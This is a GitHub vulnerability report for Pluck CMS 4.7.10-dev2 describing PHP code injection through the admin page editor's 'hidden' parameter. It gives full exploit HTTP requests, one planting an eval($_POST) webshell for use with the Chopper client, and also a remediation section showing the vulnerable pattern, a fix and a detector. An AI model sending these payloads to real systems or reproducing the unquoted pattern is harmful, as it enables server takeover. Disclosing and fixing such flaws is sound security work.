pluck-cms / pluck

Central repo for pluck cms
http://www.pluck-cms.org

Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability when creating a new web page #80

Closed SecurityCN closed 4 years ago

SecurityCN commented 4 years ago

Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability when creating a new web page

Vulnerability location: data\inc\functions.admin.php, lines 531-535

It saves the hidden parameter passed in the POST request into a PHP file, but does not escape the special character (') in the value, so the value can close the PHP string literal and remotely execute commands such as phpinfo(), eval(), etc.

Demo: After the installation succeeds, go to the admin background. Create a new page, enter a title and content, select "Show webpage", submit the request, then intercept the request packet and modify the value of the hidden parameter to `no';phpinfo();'`.

POST /pluck-4.7.10-dev2/admin.php?action=editpage HTTP/1.1
Host: 192.168.80.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.1/pluck-4.7.10-dev2/admin.php?action=editpage
Cookie: PHPSESSID=b01p8o9n85qbjq6f1tj50anlp3
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 131

title=aaaa&seo_name=&content=%3Cp%3Eaaaa%3C%2Fp%3E&description=&keywords=&hidden=no';phpinfo();'&sub_page=&theme=default&save=%E5%82%A8%E5%AD%98


http://192.168.80.1/pluck-4.7.10-dev2/?file=aaaa

Write a one-line webshell (a "one-sentence Trojan")

POST /pluck-4.7.10-dev2/admin.php?action=editpage HTTP/1.1
Host: 192.168.80.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.1/pluck-4.7.10-dev2/admin.php?action=editpage
Cookie: PHPSESSID=b01p8o9n85qbjq6f1tj50anlp3
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 144

title=bbbb&seo_name=&content=%3Cp%3Ebbbb%3C%2Fp%3E&description=&keywords=&hidden=no';@eval($_POST[b]);'&sub_page=&theme=default&save=%E5%82%A8%E5%AD%98

Connect to it with Chopper.
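The defect described in the report is a value spliced into PHP source without quoting. The following is an added illustration, not pluck's own code: it assumes a hypothetical page store that writes each page's metadata into a PHP file which is later included, and it places the unquoted pattern beside a hardened version (allow-list plus var_export()) together with a small token-based check a maintainer can run over generated data files to spot code that should not be there. The function names, file paths and the `hidden` value are constructed for this example.

```php
<?php
// Added illustration, not pluck's own code. Hypothetical page store: metadata is
// written to a PHP file and include()d later, which is the pattern the report
// describes for the "hidden" parameter.

// VULNERABLE: the raw POST value is spliced into PHP source. A single quote in
// $hidden closes the string literal, and everything after it runs as PHP when
// the generated file is included.
function write_page_meta_vulnerable(string $path, string $hidden): void
{
    $code = "<?php\n\$hidden = '" . $hidden . "';\n?>";
    file_put_contents($path, $code);
}

// HARDENED: (1) reject anything outside the expected domain, and (2) serialize
// with var_export(), which emits a correctly quoted PHP string literal, so the
// value cannot break out of the literal even if the allow-list is relaxed later.
function write_page_meta_hardened(string $path, string $hidden): void
{
    if (!in_array($hidden, ['yes', 'no'], true)) {
        throw new InvalidArgumentException('hidden must be "yes" or "no"');
    }
    $code = "<?php\n\$hidden = " . var_export($hidden, true) . ";\n?>";
    file_put_contents($path, $code);
}

// DETECTION: a generated data file that only assigns string literals should
// contain no bare identifiers (T_STRING tokens). Any that appear, e.g. a
// function name, indicate injected code. Works without executing the file.
function suspicious_identifiers(string $source): array
{
    $found = [];
    foreach (token_get_all($source) as $tok) {
        if (is_array($tok) && $tok[0] === T_STRING) {
            $found[] = $tok[1];
        }
    }
    return $found;
}

// Self-check in an isolated temp directory. Nothing generated here is included.
$payload = "no';phpinfo();'";        // constructed input, taken from the report
$dir = sys_get_temp_dir() . '/pluck-demo-' . getmypid();
mkdir($dir);

write_page_meta_vulnerable("$dir/vuln.php", $payload);
$vulnSrc = file_get_contents("$dir/vuln.php");
echo $vulnSrc, "\n";
// The file now contains a live phpinfo(); statement outside the string literal.
echo 'identifiers in vuln.php: ', implode(', ', suspicious_identifiers($vulnSrc)), "\n";

try {
    write_page_meta_hardened("$dir/safe.php", $payload);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

// Even with the allow-list removed, var_export() keeps the quote inert:
$safeSrc = "<?php\n\$hidden = " . var_export($payload, true) . ";\n?>";
echo $safeSrc, "\n";
echo 'identifiers in escaped source: ', count(suspicious_identifiers($safeSrc)), "\n";

unlink("$dir/vuln.php");
@unlink("$dir/safe.php");
rmdir($dir);
```

The allow-list is the actual fix for this parameter, since `hidden` only ever means yes or no; var_export() is the general rule for any value that must be written into PHP source, and the token scan is a cheap way to audit existing data files after the fact rather than trusting that every writer was fixed.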

BSteelooper commented 4 years ago

Could you please test the attached version?

pluck-4.7.10-dev3.tar.gz

BSteelooper commented 4 years ago

Have you retested with the latest dev version?